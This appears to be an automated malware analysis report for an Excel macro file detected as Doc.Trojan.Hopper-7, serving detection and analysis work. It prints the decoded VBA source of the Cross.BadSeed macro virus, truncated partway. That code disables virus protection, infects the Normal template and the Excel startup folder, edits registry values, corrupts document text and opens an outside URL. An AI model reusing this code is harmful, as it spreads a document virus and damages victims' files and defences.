Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 aafefcf94ec34f32…

MALICIOUS

Office (OLE)

29.5 KB Created: 1998-12-08 08:08:44 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 05243d56856db0239f07c5a01e765404 SHA-1: bcd373c20fa250429cac3a4ddc3bc92361755a1d SHA-256: aafefcf94ec34f32080b848ab4146eac61dd16c2d19bb6fd85293889371ed0c7
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The critical ClamAV detection and the presence of VBA macros indicate malicious intent. The VBA script attempts to establish persistence by writing to registry keys related to Excel startup and embedding itself into the Normal template. It also uses CreateObject and GetObject calls, common in macro-based malware.

Heuristics 5

  • ClamAV: Doc.Trojan.Hopper-7 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hopper-7
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htm� In document text (OLE body)
    • http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htmIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6397 bytes
SHA-256: fcfe587336906b8f0ee1adc7151fc22f3ee65937d733730af42b6d04827ea4f0
Detection
ClamAV: Doc.Trojan.Hopper-7
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Cross.BadSeed v0.4 /1nternal
Private InRoutine As Boolean
Private Sub Document_Close()
    On Error Resume Next
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Set NT = NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        NT.DeleteLines 1, NT.CountOfLines
        NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
        Set xlApp = CreateObject("Excel.Application")
        If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
            System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
            System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel", "Options6") = ""
            xlApp.Workbooks.Add.SaveAs xlApp.Application.StartupPath & "\Book1."
            xlApp.Workbooks("Book1.").VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
            xlApp.Workbooks("Book1.").Close SaveChanges:=True
        End If
        xlApp.Application.Quit
    End If
    If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
        AD.DeleteLines 1, AD.CountOfLines
        AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
    End If
    Select Case Day(Now)
        Case 15 And (Int((10 * Rnd) + 1) = 1)
            ActiveDocument.FollowHyperlink Address:="http://www.geocities.com/SiliconValley/Horizon/9386/actxtest.htm", NewWindow:=True, AddHistory:=False
        Case 1 And (Int((10 * Rnd) + 1) = 1)
            For i = 1 To ActiveDocument.Characters.Count
                If ActiveDocument.Characters(i).Text = "I" Then ActiveDocument.Characters(i).Text = "1"
            Next
        Case 5 And (Int((10 * Rnd) + 1) = 1)
            For i = 1 To ActiveDocument.Words.Count
                If ActiveDocument.Words(i).Text = "not" Then ActiveDocument.Words(i).Text = ""
            Next
        Case 10 And (Int((15 * Rnd) + 1) = 1)
            With Assistant.NewBalloon
                .Heading = "Cross.BadSeed v0.4"
                .Text = "Programmer:        1nternal" + Chr(13) + "Class Infection:    VicodenES" + Chr(13) + "ActiveX Concept: 1nternal" + Chr(13) + "Book1. Concept:  VicodenES" + Chr(13) + Chr(13) + "1nternal also wishes to thank all contributors and supporters which have made Cross.BadSeed possible."
                .Show
            End With
        Case 20 And (Int((5 * Rnd) + 1) = 1)
            Application.StatusBar = "Cross.BadSeed v0.4 /1nternal"
    End Select
End Sub
Private Sub Workbook_Deactivate()
    On Error Resume Next
    If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" And InRoutine <> True Then
        InRoutine = True
        Set WordObj = GetObject(, "Word.Application")
        If WordObj = "" Then
            Set WordObj = CreateObject("Word.Application")
            Quit = True
        End If
        Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
        If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
            WordObj.Options.SaveNormalPrompt = False
            NT.DeleteLines 1, NT.CountOfLines
            NT.InsertLines 1, "Public Sub DisableAV()" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "System.PrivateProfileString("""", ""HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel"", ""Options6"") = """"" + Chr(13) + Chr(10) + "End Sub"
            W
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.